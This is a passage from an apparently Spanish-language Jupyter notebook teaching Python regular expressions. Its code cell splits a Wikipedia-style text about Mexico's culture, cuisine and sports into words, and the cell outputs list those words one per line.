blicanos\nfederalistas\ncentralistas\nconservadora\npromulgación\nseparatistas\nfederalistas\nreinstalaron\nConstitución\nprosiguieron\ninsurrección\npromulgación\nintervención\nfusilamiento\nConstitución\nrecuperación\nconsecuencia\nclientelares\nnotablemente\nprivatizadas\ncuestionando\nresponsables\nnarcotráfico\nfuncionarios\nacrecentaron\npresidencial\npresidencial\nconcerniente\nConstitución\npreeminencia\nconstitución\nConstitución\nobligaciones\npromulgación\nlegisladores\nConstitución\nobligaciones\ndeliberativa\ndeclaratoria\ndeclaratoria\nnombramiento\ndesaparición\nConstitución\nConstitución\nConstitución\nobligaciones\nConstitución\nresoluciones\ninterponerse\nconstitución\nconstitución\nlegislativos\norganización\ndesaparición\ninternamente\nayuntamiento\nayuntamiento\nDelegaciones\nayuntamiento\norganización\nconcerniente\norganización\nconcordancia\nlegislativas\nayuntamiento\norganización\nordenamiento\ndenominación\ntransparente\norganización\nmanipulación\nRegeneración\nintervención\nproscripción\ndificultades\ndiplomáticas\npacificación\nprotagonismo\nfallidamente\nOrganización\nacercamiento\nacercamiento\ndiplomáticas\ndiplomáticas\nconstituidas\nautorización\ncorresponden\noperatividad\ncumplimiento\ncorresponden\nconstituidos\nNorteamérica\nNorteamérica\nNeovolcánico\nprolongación\nNeovolcánico\nNeovolcánico\nNeovolcánico\nCitlaltépetl\nPopocatépetl\nIztaccíhuatl\nNeovolcánico\nAltiplanicie\nsemidesierto\nNeovolcánico\ntemperaturas\ntemperaturas\ntemperaturas\ntemperaturas\nAltiplanicie\nsemidesierto\ntemperaturas\nconstrucción\nartificiales\nmegadiversos\nconsiderados\nprovenientes\nchihuahuense\nmanufacturas\ndesarrollada\nconstrucción\npetrolíferos\npetrolíferos\nsubsidiarias\nestratégicos\nelectricidad\nElectricidad\nmanufacturas\npresidencial\nexpresidente\nexpresidente\nprovenientes\ndesempleados\ndecimocuarta\ndistribución\nrecuperación\ncalificación\nexpresidente\ncertificaron\ndecimotercer\nprovenientes\nprovenientes\npatrocinados\npreferencias\nrehabilitado\ncomunicación\nremodelación\nmejoramiento\nrecuperación\ncomunicación\ndesprestigio\ncriminalidad\ngeneralizado\nhomosexuales\npopularmente\ndesarrollado\nindicaciones\nalimentación\nelectricidad\nElectricidad\nadministraba\nelectricidad\ndistribución\nrepresentaba\nelectricidad\nexportadores\ndecimocuarto\nprovenientes\nreinvertidos\naprovechando\nproyecciones\nproyecciones\ninterurbanos\ntecnológicos\nprivatizados\nconstrucción\ncomunicación\nparticulares\ndependencias\ncomunitarias\nconferencias\ncomunicación\nimplementado\ncomunitarias\ncomputadoras\nestablecidas\nconglomerado\nconglomerado\ncomunicación\nprogramación\nradiofónicos\nexclusividad\nConstitución\nconstrucción\nconstrucción\nconstrucción\nconsiderarla\npredominante\nconsideraron\nconstrucción\nconstituiría\ndistinguidos\ndemográficos\ninnumerables\nconsiderable\nestadísticas\nestadísticas\nEstratégicos\nSecretariado\noficialmente\nConstitución\nConstitución\nConstitución\nintroducción\ncontempladas\nconstitución\npersonalidad\nasociaciones\ndiplomáticas\nconvirtiendo\ncongregación\nagrupaciones\ncristianismo\nprotestantes\ncristianismo\nprovenientes\nprotestantes\nprotestantes\nprotestantes\nprotestantes\nprotestantes\nantropólogos\nantropólogos\nintervención\npracticantes\nprovenientes\ncuantitativa\nTecamachalco\npracticantes\ncristianismo\nantropólogos\ncotidianidad\nprehispánico\nreligiosidad\nreligiosidad\nLingüísticos\noficialmente\nconsiderados\ncomunicación\nconsiderable\nPlautdietsch\nPlattdeutsch\ncolonización\nconcentrados\nconcentrados\nprovenientes\ndiscapacidad\ncivilización\nreemplazando\nConstitución\nOrganización\nIberoamérica\nclasificadas\nPanamericana\ntecnológicas\ntecnológicas\nConstitución\nConstitución\nrelacionando\nconstrucción\nestereotipos\nconstrucción\nnacionalismo\nprivilegiado\ncompositores\ncatedralicia\ncompositores\ninterrumpida\nfestividades\ncompositores\ncompositores\ncompositores\nrestauración\ncompositores\nprehispánica\nprehispánica\ninstrumentos\nmembranófono\ninfluenciada\nindumentaria\nadaptándolos\nprovincianos\ncompositores\npremiaciones\nromanticismo\ninterpretada\ncompositores\ncompositores\nrepresentado\ninstrumentos\ntransformado\nsustituyendo\ninstrumentos\nsintetizador\npopularizado\nconocimiento\ncotidianidad\nChimalhuacan\nprovenientes\nincorporaron\nnacionalidad\nVillaurrutia\nprecolombino\nconsideradas\nprehispánico\nTecamachalco\nZinacantepec\nmanifestaron\natribuírsele\nreligiosidad\nnovohispanos\nnovohispanos\nHermenegildo\nmezclándolos\nespectadores\nperformances\nhistrionismo\ngeneralmente\nromanticismo\nnacionalismo\naristocracia\ntrascendente\narquitectura\nXicocotitlan\nTenochtitlan\nincorporadas\nintrodujeron\narquitectura\nprehispánico\nconstrucción\nintroducidos\nprehispánica\narquitectura\narquitectura\narquitectura\nnacionalista\narquitectura\narquitectura\nMediterráneo\narquitectura\nornamentales\nmonumentales\npersonalidad\nmetalistería\ntalabartería\naportaciones\ncoproducidas\ndaguerrotipo\ncomercializa\nHermenegildo\nestablecerse\ngastronómica\ncolonización\nconstelación\ningredientes\nreelaborados\ningredientes\nconstrucción\nAnálogamente\nAntropología\ncorresponden\nconsiderados\nsacrificados\ndistribuidos\nPanamericano\nOrganización\nrepresentada\nespecialidad\nEspecialidad\nespecialidad\nChampionship\nparticiparon\noficialmente\ninauguración\nprecisamente\nParalímpicos\n" ] ], [ [ "Los conjuntos se puden usar dentro de `[^ ]` para negarlos, pero muchas veces no hace falta ya que las letras mayúsculas (`\\D, \\S, \\W`) ya significan lo opuesto de cada conjunto respectivamente.", "_____no_output_____" ] ], [ [ "# Palabras\nexpresion = re.compile(r\"\\b\\S+\\b\")\nbusqueda = expresion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "\u001b[1;30;43mSe truncaron las últimas líneas 5000 del resultado de transmisión.\u001b[0m\nescritor\nCarlos\nMonsiváis\ny\nel\nfotógrafo\nGabriel\nFigueroa\nCabe\nmencionar\nal\ndirector\nespañol\nnacionalizado\nmexicano\nLuis\nBuñuel\ny\nsus\naportaciones\nal\ncine\nsurrealista\nUn\nChien\nAndalou\ny\nL'age\nD'Or\nambas\ncoproducidas\ncon\nSalvador\nDalí\ny\nque\nrealizó\nen\nFrancia\nposteriormente\nen\nMéxico\nrealizó\nLos\nOlvidados\ndeclarada\nMemoria\ndel\nMundo\npor\nla\nUNESCO\nen\n2003\nque\nle\nvalió\nsu\nrevalorización\nen\nel\nFestival\nde\nCannes\nasí\ncomo\nSubida\nal\ncielo\nNazarín\ny\nSimón\ndel\ndesierto\nque\ntambién\nobtuvieron\nreconocimiento\nmundial\na\ntravés\nde\nCannes\nEn\nEspaña\nrealizaría\nViridiana\ncon\nla\nque\nobtuvo\nla\nPalma\nde\nOro\ny\nvolvería\na\nFrancia\na\nfilmar\nentre\notras\nLe\ncharme\ndiscret\nde\nla\nburgeoisie\ncon\nla\nque\nobtuvo\nel\nÓscar\na\nmejor\npelícula\nextranjera\nEl\ncine\nmexicano\ncontemporáneo\nincluye\nfiguras\nnotables\ncomo\nlos\ndirectores\nArturo\nRipstein\nFelipe\nCazals\nen\ntanto\nque\nen\námbito\ninternacional\ndestacan\nAlejandro\nGonzález\nIñarritu\nGuillermo\ndel\nToro\ny\nAlfonso\nCuarón\nentre\notros\nasí\ncomo\nal\nfotógrafo\nEmmanuel\nLubezki\nEl\nprimer\ndaguerrotipista\nmexicano\nse\nllamaba\nJ\nM\nDíaz\nGonzález\nera\nestudiante\nde\nSan\nCarlos\ny\nabrió\nen\n1844\nun\nestudio\nen\nla\ncalle\nde\nSanto\nDomingo\nCd\nde\nMéxico\nen\ndonde\nrealizaba\nminiaturas\nal\nóleo\ny\ndaguerrotipos\nDespués\nal\nsuperarse\nla\ntécnica\ndel\ndaguerrotipo\nse\ntienen\nnoticias\nde\nla\nutilización\ndel\npapel\nen\nla\nfotografía\nen\nMéxico\ndesde\n1851\nLos\nprecios\nbajan\nla\nesfera\nprivada\ndeja\nde\nser\nsu\nespacio\nexclusivo\nTambién\nse\nutiliza\nla\nfotografía\ncomo\npromoción\npolítica\nA\nraíz\nde\nla\nmuerte\ndel\npresidente\nBenito\nJuárez\nla\nempresa\nCruces\ny\nCampa\ncomercializa\nuna\nedición\nde\n20\n000\nejemplares\nde\nsu\nretrato\nen\nformato\ntarjeta\nde\nvisita\nA\nprincipios\ndel\nXX\nJesús\nHermenegildo\nAbitia\nfue\nfotógrafo\nde\nestudio\ny\nde\nexteriores\ncamarógrafo\ndel\ncine\ndocumental\ny\nde\nficción\nAgustín\nVíctor\nCasasola\nfue\nun\nfotógrafo\nque\nlogró\nestablecerse\ncomo\nretratista\npor\nantonomasia\nde\nla\nclase\ngobernante\nPorfirio\nDíaz\nFrancisco\nVilla\nHuerta\nentre\notros\nLas\nfotografías\nde\nManuel\nÁlvarez\nBravo\nurgen\nen\nlos\nrincones\nlogrando\nescudriñar\nlo\nque\notros\nno\nlogran\ndetectar\nmientras\nque\nel\nfotógrafo\nNacho\nLópez\nfue\ncapaz\nde\ntrasladar\na\nsus\nfotografías\nsus\nguiones\ne\nhistorias\nEn\n2005\nMéxico\npresentó\nla\ncandidatura\nde\nsu\ngastronomía\npara\nPatrimonio\nde\nla\nHumanidad\nde\nla\nUnesco\nsiendo\nla\nprimera\nocasión\nen\nque\nun\npaís\nhabía\npresentado\nsu\ntradición\ngastronómica\npara\ntal\nefecto\nSin\nembargo\nen\nuna\nprimera\ninstancia\nel\nresultado\nfue\nnegativo\npues\nel\ncomité\nno\npuso\nel\nénfasis\nadecuado\nen\nla\nimportancia\ndel\nmaíz\nen\nla\ncocina\nmexicana\nFinalmente\nel\n16\nde\nnoviembre\nde\n2010\nla\ngastronomía\nmexicana\nfue\nreconocida\ncomo\nPatrimonio\nCultural\nInmaterial\nde\nla\nHumanidad\nEl\norigen\nde\nla\nactual\ncocina\nmexicana\nse\nestablece\ndurante\nla\ncolonización\nespañola\nsiendo\nuna\nmezcla\nde\nlas\ncomidas\nde\nEspaña\ny\nlos\nindios\nnativos\nDe\norigen\nindígena\nes\nel\nmaíz\nel\nchile\nconocido\nen\ncasi\ntodo\nel\nmundo\nhispanoparlante\ncomo\nají\nlos\nfrijoles\ncalabazas\naguacates\ncamote\njitomates\ncacao\nel\nguajolote\ny\nmuchas\nfrutas\ny\ncondimentos\nmás\nDe\nigual\nmanera\nalgunas\ntécnicas\nde\ncocina\nque\nse\nemplean\nen\nla\nactualidad\nson\nherencia\nde\nlos\npueblos\nprehispánicos\ncomo\nla\nnixtamalización\ndel\nmaíz\nel\ncocimiento\nde\nalimentos\nen\nhornos\na\nras\nde\ntierra\nla\nmolienda\nen\nmolcajete\ny\nmetate\nCon\nlos\nespañoles\nllegaron\nlas\ncarnes\nde\npuerco\nres\ny\npollo\nla\npimienta\nel\nazúcar\nla\nleche\ny\ntodos\nsus\nderivados\nel\ntrigo\ny\nel\narroz\nlos\ncítricos\ny\notra\nconstelación\nde\ningredientes\nque\nforman\nparte\nde\nla\ndieta\ncotidiana\nde\nlos\nmexicanos\nDe\nese\nencuentro\nde\ndos\ntradiciones\nculinarias\ncon\nmilenios\nde\nantigüedad\nnacieron\nel\npozole\nel\nmole\nla\nbarbacoa\ny\nlos\ntamales\nen\nsus\nformas\nactuales\nel\nchocolate\nuna\nvariada\ngama\nde\npanes\nlos\ntacos\ny\nel\namplio\nrepertorio\nde\nantojitos\nmexicanos\nNacieron\nbebidas\ncomo\nel\natole\nel\nchampurrado\nel\nchocolate\ncon\nleche\ny\nlas\naguas\nfrescas\npostres\ncomo\nel\nacitrón\nbiznaga\ny\ntoda\nla\ngama\nde\ndulces\ncristalizados\nel\nrompope\nla\nCajeta\nla\njericaya\ny\nel\namplio\nrepertorio\nde\ndelicias\ncreadas\nen\nlos\nconventos\nde\nmonjas\nen\ntodas\npartes\ndel\npaís\nAlgunas\nbebidas\nmexicanas\nhan\nrebasado\nsus\nfronteras\ny\nse\nconsumen\ncotidianamente\nen\nAmérica\nCentral\nEstados\nUnidos\nCanadá\nEspaña\ny\nFilipinas\ntal\nes\nel\ncaso\ndel\nagua\nde\nJamaica\nla\nhorchata\nde\narroz\nel\nagua\nde\nraíz\nlas\nmargaritas\ny\nel\npropio\ntequila\nLa\nhistoria\ndel\npaís\ny\nsus\nvínculos\ncon\notros\npueblos\npermitieron\nla\nincorporación\nde\notras\ncocinas\na\nla\ncocina\nmexicana\nLa\nNao\nde\nChina\nque\nen\nrealidad\nera\nun\ngaleón\nde\nManila\ntrajo\ndel\noriente\nuna\ngama\nde\nvariadas\nespecias\ny\nsobre\ntodo\nel\narroz\nUn\nbuen\nmole\npoblano\nes\nimpensable\nsin\narroz\na\nla\nmexicana\nLa\ncocina\nárabe\nllegó\na\nMéxico\nindirectamente\npor\nmedio\nde\nlos\nespañoles\nconquistadores\nTambién\nla\nrelación\ncon\nlos\npaíses\nlatinoamericanos\ndejó\nsu\nimpronta\nen\nla\ncocina\npopular\nquizá\nlos\ncasos\nmás\nconocidos\nson\nlos\nceviches\ny\nlos\nmoros\ncon\ncristianos\ndeudores\nde\nla\ngastronomía\ncubana\nque\nhan\nsido\nasimilados\ny\nreelaborados\ncon\ningredientes\npropios\nde\nMéxico\nLas\ninvasiones\ndejaron\nsu\nhuella\nen\ntoda\nla\ncultura\nmexicana\ny\nla\ncocina\nno\nes\nla\nexcepción\nEl\ngusto\npor\nla\ncarne\nde\nres\nmolida\nllegó\ncon\nel\nejército\nbelga\nde\nCarlota\nEl\npan\nde\ncaja\nfue\nsegún\nla\nleyenda\nun\ninvento\nde\nlas\ntropas\nestadounidenses\nque\nvinieron\na\nMéxico\nen\n1847\nLa\nllegada\nde\ninmigrantes\nde\notras\nlatitudes\nen\ntodo\nel\nsiglo\nXIX\ny\nXX\ntambién\nparticipó\nen\nla\nconstrucción\nde\nla\ngastronomía\nmexicana\nComo\nejemplo\nlos\nquesos\nitalianos\ny\nla\npolenta\nque\nhoy\nse\nfabrican\nen\nChipilo\nPuebla\no\nlos\nfranceses\nde\nOrizaba\nal\nigual\nque\nsu\npan\ny\nlos\nalemanes\nmenonitas\nde\nChihuahua\nLos\nmineros\ningleses\nde\nMéxico\nsentaron\nlas\nbases\ndel\npaste\nun\nhojaldre\nque\nhoy\nse\nrellena\nlo\nmismo\nde\nqueso\ny\npapas\nque\nde\nmole\nverde\nde\npepitas\nde\ncalabaza\nLas\ntortas\nson\nunos\nemparedados\nelaborados\ncon\npan\nllamado\ntelera\ny\nal\nigual\nque\nlos\ntacos\ndiversos\nalimentos\ntales\ncomo\njamón\ncon\nqueso\ncarne\nal\npastor\ncochinita\npibil\ncarne\nde\npollo\nSe\ndice\nque\nse\noriginaron\ndurante\nla\nGuerra\nde\nReforma\ncuando\nse\nnecesitaba\nencontrar\nuna\nforma\nde\ndistribuir\nalimentos\nentre\nlas\ntropas\nmexicanas\nMuchas\nson\nlas\nbebidas\npropias\nde\nla\ncocina\nmexicana\nlas\naguas\nfrescas\nlos\natoles\nel\nchocolate\nel\nmezcal\nel\ntequila\nel\nvino\nel\ntepache\nla\ncharanda\nel\ntejuino\nla\ncerveza\nSegún\nun\nestudio\nCuánto\nvale\nla\ncultura\nrealizado\npor\nel\neconomista\nErnesto\nPiedras\nlas\nindustrias\nculturales\ngeneran\nel\n6,7\ndel\nproducto\ninterno\nbruto\nde\nMéxico\nEl\nestudio\nfue\npresentado\nen\n2004\ny\nfue\npublicado\npor\nel\nConsejo\nNacional\npara\nla\nCultura\ny\nlas\nArtes\nLas\nindustrias\nculturales\nson\nidentificadas\npara\nMéxico\ncomo\nun\nsector\nque\nrepresenta\nun\nmotor\nde\ncrecimiento\ny\ndesarrollo\neconómicos\nsuperado\nsolo\npor\nlos\nsectores\nde\nla\nmaquila\nel\npetróleo\ny\nel\nturismo\nEn\ntérminos\nde\ngeneración\nde\nempleo\nsu\nparticipación\nen\nla\npoblación\neconómicamente\nactiva\nalcanza\n3.6\nAnálogamente\nel\ncálculo\npara\neste\nsector\nreporta\nen\ntérminos\ndel\ncomercio\nexterior\nuna\nbalanza\ncomercial\nde\nsuperávit\ny\nen\nconstante\ncrecimiento\nMéxico\ncuenta\ncon\ntres\nPremios\nNobel\nEn\nMéxico\nsegún\ninformación\ndel\nInstituto\nNacional\nde\nAntropología\ne\nHistoria\nI.N.A.H\nen\ndiciembre\nde\n2005\nse\ntenían\nregistrados\n37\n266\nsitios\narqueológicos\nen\nMéxico\nLos\nsitios\narqueológicos\nson\naquellos\ndonde\nhan\nsido\nencontradas\nevidencias\nde\nocupación\nhumana\nanterior\ny\nno\nnecesariamente\ncorresponden\na\nsitios\nprehispánicos\naunque\nla\nmayor\nparte\nlo\nsean\nPor\nejemplo\nen\nMonterrey\nNuevo\nLeón\nexiste\nun\nmuseo\nsobre\narqueología\nindustrial\nEn\nla\nCiudad\nde\nMéxico\nlos\narqueólogos\nhan\nrescatado\nrestos\nmateriales\nde\nun\nconvento\ncolonial\nque\nse\nlocalizó\nen\nel\nmismo\nsitio\ndonde\nestá\nactualmente\nel\nPalacio\nde\nBellas\nArtes\nComo\nse\nha\ndicho\nexisten\nnumerosos\nsitios\npertenecientes\na\nlos\npueblos\nprehispánicos\nmiles\nde\nellos\naunque\nno\ntodos\nestán\nabiertos\nal\npúblico\nLa\nzona\nque\nconcentra\nla\nmayor\nparte\nde\nestos\nsitios\nes\nel\nárea\nmaya\nseguida\npor\nel\nCentro\nde\nMéxico\ny\nlos\nvalles\nde\nOaxaca\nLa\nley\nmexicana\nconsidera\nmonumentos\nhistóricos\naquellos\nconstruidos\nentre\nlos\nsiglos\nXVI\ny\nXIX\nes\ndecir\ndesde\nla\nllegada\nde\nlos\nespañoles\nhasta\nel\nsiglo\nanterior\nTanto\nlas\nzonas\narqueológicas\ncomo\nlos\nmonumentos\nhistóricos\nson\nconsiderados\ncomo\npatrimonio\nde\nla\nnación\nmexicana\ny\nson\ncustodiados\npor\nel\nI.N.A.H\ny\nel\nInstituto\nNacional\nde\nBellas\nArtes\nI.N.B.A\nForman\nparte\ndel\ncomplejo\nde\nmonumentos\nhistóricos\nlos\nnúcleos\noriginales\nde\nvarias\npoblaciones\nimportantes\ndel\npaís\ncomo\nCiudad\nde\nMéxico\nGuanajuato\nPuebla\nde\nZaragoza\nOaxaca\nde\nJuárez\ny\nSan\nFrancisco\nde\nCampeche\ntodas\nellas\nreconocidas\nademás\ncomo\nPatrimonio\nCultural\nde\nla\nHumanidad\npor\nla\nUnesco\nAdemás\nde\nestos\ngrandes\naglomerados\nexisten\nnumerosas\nconstrucciones\ndispersas\npor\ntodo\nel\npaís\nque\nforman\nparte\ndel\ncatálogo\ndel\nI.N.A.H\nA\nfinales\ndel\nsiglo\nXIX\ncomenzó\nel\nproceso\nde\nindustrialización\nel\ncual\nrepresentó\ngrandes\navances\nen\nciencia\ny\ntecnología\ndurante\nel\nsiglo\nsiguiente\nDurante\nel\nsiglo\nXX\nse\nfundaron\nnuevos\ninstitutos\nde\ninvestigación\ny\nuniversidades\ncomo\nla\nUniversidad\nNacional\nAutónoma\nde\nMéxico\nDe\nacuerdo\ncon\ndatos\nde\nScopus\nuna\nbase\nde\ndatos\nbibliográfica\nde\nresúmenes\ny\ncitas\nde\nartículos\nde\nrevistas\ncientíficas\nMéxico\nse\nposiciona\nen\nel\nlugar\nnúmero\n28\ndel\nmundo\nen\nmateria\nde\npublicaciones\ncientíficas\nsiendo\nel\nsegundo\nen\nAmérica\nLatina\ndespués\nde\nBrasil\ny\nel\nsegundo\nentre\nlos\npaíses\nhispanoparlantes\ndespués\nde\nEspaña\nAdemás\nocupa\nel\nlugar\nnúmero\n34\nde\npaíses\nordenados\npor\nÍndice\nh\ncon\nun\npuntaje\nde\n232\nMéxico\nes\nuno\nde\nlos\npaíses\ncon\nmás\ngalardones\ndel\nPremio\nen\nCiencias\nde\nla\nUnesco\nSin\nembargo\ndurante\n2012\nMéxico\nfue\nel\npaís\nde\nla\nOCDE\nque\nmenos\ninvirtió\nen\ninvestigación\ny\ndesarrollo\ncon\nun\naproximado\nde\n0,47\ndel\nPIB\nEl\n20\nde\nabril\nde\n2010\nla\nCámara\nde\nDiputados\naprobó\nla\niniciativa\npara\nla\ncreación\nde\nla\nAgencia\nEspacial\nMexicana\nla\nley\nfue\npromulgada\nel\n13\nde\njulio\nde\n2010\ny\nfue\npublicada\nen\nel\nDiario\nOficial\nde\nla\nFederación\nel\n30\nde\njulio\nde\n2010\nCon\nfrecuencia\nse\nle\ndenomina\na\nla\ncharrería\ncomo\nel\ndeporte\nnacional\nde\nlos\nmexicanos\nEste\ndeporte\nes\nderivado\nde\nlas\nfaenas\nde\nlos\ncaporales\nen\nlas\nhaciendas\nganaderas\nSu\norigen\ndata\nde\nla\népoca\ncolonial\ny\nse\natribuye\na\nMaximiliano\nde\nHabsburgo\nla\ncreación\ndel\ntraje\nde\ncharro\nen\nsu\nforma\ndefinitiva\nAlgunos\ndeportes\ntienen\nun\norigen\nen\nlas\nculturas\nprehispánicas\nde\nMesoamérica\nTal\nes\nel\ncaso\nde\nla\npelota\ntarasca\nla\npelota\npurépecha\nla\npelota\nmixteca\nde\nOaxaca\ny\nel\nulama\nde\nSinaloa\ntodos\nestos\nvinculados\ncon\nel\nantiguo\njuego\nde\npelota\npracticado\npor\nlos\npueblos\nmesoamericanos\nEste\njuego\nde\npelota\ndramatizaba\nel\nmovimiento\nde\nlos\nastros\nen\nel\nfirmamento\ny\nen\nteoría\nsus\ndescendientes\nactuales\ntambién\nlo\nhacen\nclaro\nestá\nque\nahora\nlos\nequipos\nvencidos\nno\nson\nsacrificados\na\nlos\ndioses\nEn\nChihuahua\nlos\ntarahumaras\nrealizan\ncarreras\nrituales\nllamadas\nrarajípara\ny\nariweta\nLa\nprimera\nes\npara\nvarones\ny\nes\njugada\nen\nequipos\nque\nse\nrelevan\npara\ncompletar\nun\nrecorrido\nde\nvarios\nkilómetros\npor\nla\nsierra\npateando\nuna\npequeña\npelota\nLa\nsegunda\nes\npara\nmujeres\ny\nellas\ndeben\nhacer\nel\nrecorrido\nempujando\nun\naro\nSi\nbien\nla\nSecretaría\nde\nEducación\nPública\nincluye\nla\nenseñanza\nde\nla\neducación\nfísica\nen\nlas\nescuelas\na\nsu\ncargo\ncomo\nhacen\ntambién\nlas\ninstancias\nestatales\nencargadas\nde\nla\ninstrucción\nen\nel\npaís\nel\ndeporte\norganizado\nno\nes\nuna\nactividad\ncomún\nentre\nel\npueblo\nEl\nmás\nextendido\nsea\nquizá\nel\nfútbol\naunque\nen\nel\nnorte\ndel\npaís\ntienen\nmayor\npresencia\nel\nbásquetbol\nel\nbéisbol\ny\nel\nsófbol\nestos\ndos\núltimos\ntambién\ncon\nmuy\nbuena\naceptación\nen\nel\nsur\ndel\npaís\nen\nel\nsur\nde\nla\nCiudad\nde\nMéxico\nla\npráctica\naficionada\ndel\nfrontón\ny\nla\npelota\nvasca\nes\nmuy\nimportante\ny\nha\ndado\nlustre\nal\ndeporte\nmexicano\na\nnivel\ninternacional\nCon\nel\ncreciente\naumento\nde\nun\nmercado\nde\njugadores\ntanto\ninfantil\ncomo\njuvenil\nel\ndeporte\nextremo\nde\nraqueta\nel\nracketball\ngoza\nde\nun\nconstante\ndesarrollo\nEl\npatinaje\nartístico\nsobre\nhielo\ny\nel\nhockey\nsobre\nhielo\nson\ndeportes\npracticados\npor\nla\njuventud\nmexicana\nacomodada\nmostrando\nun\nconstante\ncrecimiento\nOtros\ndeportes\nque\ngozan\nde\ngran\npopularidad\nen\nMéxico\nson\nel\nvoleibol\nel\ncual\nse\npráctica\ncomo\nuno\nde\nlos\ndeportes\nbásicos\na\nnivel\nescolar\nasí\ncomo\nel\nfútbol\namericano\nel\ncual\nse\npractica\nde\nmanera\norganizada\nen\ndiversas\nligas\nintegrantes\nde\nla\nONEFA\nEl\ndeporte\nmás\npopular\ny\nde\nmayor\ndifusión\nen\nel\npaís\nes\nel\nfútbol\no\ncomo\nse\nescribe\ny\npronuncia\nen\nel\npropio\npaís\nfutbol\nLa\nliga\nmexicana\nestá\ncompuesta\npor\ncuatro\ndivisiones\néstas\nson\nla\nLiga\nMX\nla\nLiga\nde\nAscenso\nla\nSegunda\nDivisión\ny\nla\nTercera\nDivisión\nademás\nde\nuna\nLiga\nFemenil\nLa\nselección\nmayor\nde\nfútbol\nha\nparticipado\nen\n15\nCopas\nMundiales\nsiendo\nsus\nmejores\nacutaciones\nlas\nfases\nde\ncuartos\nfinal\nalcanzadas\ncuando\nfue\nsede\nen\n1970\ny\n1986\ntiene\n10\ntítulos\ncontinentales\nde\nCopa\nde\nOro\nde\nla\nConcacaf\nsiendo\nel\nconjunto\ncon\nmás\ntítulos\ndel\ntorneo\nademás\nde\ntener\nun\ntítulo\ninternacional\nen\nla\nCopa\nFIFA\nConfederaciones\nen\n1999\ntambién\nha\nparticipado\nen\nla\nCopa\nAmérica\ndonde\nha\nsido\nsubcampeón\nen\ndos\nocasiones\n1993\ny\n2001\ny\ntercer\nlugar\nen\ntres\nocasiones\nEl\nestadio\noficial\npara\nsus\njuegos\ncomo\nanfitrión\nes\nel\nEstadio\nAzteca\nsede\nde\nuno\nde\nlos\nequipos\nde\nfútbol\nreconocido\nnacionalmente\nel\nClub\nAmérica\nque\nostenta\nel\nmayor\nnúmero\nde\ntítulos\ninternacionales\ncon\ndiez\nen\ntotal\nsiete\nen\nla\nLiga\nde\nCampeones\nde\nla\nConcacaf\nuno\nde\nla\nCopa\nGigantes\nde\nla\nConcacaf\ny\ndos\nde\nCopa\nInteramericana\nA\nsu\nvez\nocupa\nel\npuesto\n14\na\nnivel\nmundial\nen\ncuanto\na\nmás\ntítulos\ninternacionales\nganados\nLa\nselección\nolímpica\nganó\nla\nmedalla\nde\noro\nen\nlos\nJuegos\nOlímpicos\nde\nLondres\n2012\nmientras\nque\nla\nselección\nde\nfútbol\nsub-17\nse\ncoronó\nen\ndos\nocasiones\ndentro\nde\nla\nCopa\nMundial\nde\nFútbol\nSub-17\nen\nPerú\n2005\ny\nMéxico\n2011\nLa\nselección\nsub-20\nfue\nsubcampeona\nen\nel\nCampeonato\nMundial\nde\nTúnez\n1977\ny\ntercer\nlugar\nen\nColombia\n2011\nLa\nselección\nde\nfútbol\nplaya\nfue\nsegundo\nlugar\nen\nla\nCopa\nMundial\nde\n2007\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexicano\nse\nusa\nla\nvariante\nbeisbol\nOtro\ndeporte\ncon\ngran\ntradición\nprofesional\nes\nel\nbéisbol\nescrito\ny\npronunciado\nbeisbol\nlocalmente\nel\ncual\nsegún\nlas\núltimas\nencuestas\nes\nel\ntercer\ndeporte\nmás\npopular\nen\nMéxico\nEl\nbéisbol\nes\nel\ndeporte\nmás\npopular\nen\nlas\nregiones\nnorte\ny\nsureste\nMéxico\ncuenta\ncon\nvarias\nligas\nprofesionales\nentre\nlas\nque\ndestacan\nla\nLiga\nMexicana\nde\nBéisbol\nLMB\ny\nla\nLiga\nMexicana\ndel\nPacífico\nLMP\nLa\npopularidad\nde\nla\nLMB\nse\ndebe\na\nque\nlos\nequipos\ncon\nlos\nque\ncuenta\nestán\ndistribuidos\npor\ncasi\ntodo\nel\npaís\nes\nla\nde\nmayor\ntradición\npues\nfue\nfundada\nen\n1925\ny\nha\naportado\nla\nmayoría\nde\nlos\npeloteros\nmexicanos\nque\nllegan\na\nlas\nGrandes\nLigas\nestá\nafiliada\na\nlas\nLigas\nMenores\nde\nlos\nEstados\nUnidos\nbajo\nla\nclasificación\nAAA\ny\ntiene\nsu\npropia\nacademia\nde\ndesarrollo\nde\ntalentos\nubicada\nen\nEl\nCarmen\nNuevo\nLeón\nla\nconforman\nactualmente\n16\nequipos\ndivididos\nen\n2\nzonas\nZona\nNorte\ny\nZona\nSur\nLa\nLMP\nse\njuega\nen\ninvierno\npor\nlo\nque\nsu\ntemporada\nes\nmás\ncorta\ny\nrecibe\na\nalgunos\nde\nlos\npeloteros\nmexicanos\ny\nextranjeros\nque\nen\nverano\nestán\njugando\nen\nlas\nGrandes\nLigas\nestá\nintegrada\npor\nequipos\nde\nBaja\nCalifornia\nJalisco\nNuevo\nLeón\nSinaloa\ny\nSonora\ntiene\nimportancia\na\nnivel\nnacional\ndebido\na\nque\nel\nequipo\ncampeón\nrepresenta\na\nMéxico\nen\nel\nmayor\nevento\nbeisbolístico\nde\nla\nregión\nla\nSerie\ndel\nCaribe\nen\nla\nque\ntambién\njuegan\nlos\ncampeones\nde\nlas\nligas\nde\nColombia\nPanamá\nPuerto\nRico\nRepública\nDominicana\ny\nVenezuela\nEste\ntorneo\nha\nsido\nganado\nen\nnueve\nocasiones\npor\nescuadras\nmexicanas\nOtras\nligas\nreconocidas\nen\nMéxico\nson\nla\nLiga\nInvernal\nVeracruzana\nLIV\ncuyo\nequipo\ncampeón\nrepresentó\na\nMéxico\nen\nla\nSerie\nLatinoamericana\nla\nLiga\nInvernal\nde\nBéisbol\nNayarita\nLIBN\nla\nLiga\nNorte\nde\nMéxico\nLNM\nla\nLiga\nNorte\nde\nSonora\nLNS\nla\nLiga\nMayor\nde\nBéisbol\nde\nLa\nLaguna\nLMBL\nla\nLiga\nEstatal\nde\nBéisbol\nde\nChihuahua\nLEB\nla\nLiga\ndel\nNorte\nde\nCoahuila\nLNC\nla\nLiga\nInvernal\nMexicana\nLIM\nla\nLiga\nPeninsular\nde\nBéisbol\nLPB\nla\nLiga\nMeridana\nde\nInvierno\nLMI\nla\nLiga\nVeracruzana\nEstatal\nde\nBéisbol\nLVEB\ncuyo\nequipo\ncampeón\nrepresenta\nen\nla\nactualidad\na\nMéxico\nen\nla\